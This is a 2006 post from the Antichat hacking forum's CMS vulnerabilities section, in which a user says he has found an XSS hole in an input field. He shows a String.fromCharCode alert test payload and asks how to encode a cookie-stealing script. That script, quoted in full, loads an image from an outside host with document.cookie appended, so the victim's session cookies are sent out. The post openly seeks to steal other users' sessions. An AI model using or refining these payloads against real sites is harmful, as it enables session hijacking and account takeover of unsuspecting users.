HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Уязвимости CMS / форумов
   
 
 
Опции темы Поиск в этой теме Опции просмотра

Алерт есть. Как закодироровать сниф в String.fromCharCode.
  #1  
Старый 30.06.2006, 02:29
m2infect
Познающий
Регистрация: 20.06.2006
Сообщений: 34
С нами: 10468577

Репутация: 5
Red face Алерт есть. Как закодироровать сниф в String.fromCharCode.

Господа. Помогите пожалуйста.
Долго и упорно искал XSS. И вот наконец результат.
Есть поле. Ввожу туда
";alert(String.fromCharCode(88,83,83))//></SCRIPT>!--<SCRIPT>alert(String.fromCharCode(88,84,83))
</SCRIPT>=&{}

пишет XTS - что соответствует 88,84,83.
Хотелось бы туда зарисовать след. текст

<script>img=new Image(); img.src="http://antichat.ru/cgi-bin/s.jpg?;"+document.cookie;</script>

Ну тут понятно что я хочу.
И если не трудно расскажите пожалуйста про этот формат String.fromCharCode.

Всем огромное спасибо.

Последний раз редактировалось m2infect; 30.06.2006 в 02:33..
 
Ответить с цитированием
 



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Как узнать пароль, если есть логин? CheAter PHP 2 12.06.2006 19:29
Есть вопрос, и есть запрос... DIAgen PHP 4 08.06.2006 13:21
Есть ли прога чтоб узнать по ip на каком сайте чел Болталка 1 31.03.2003 11:32



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.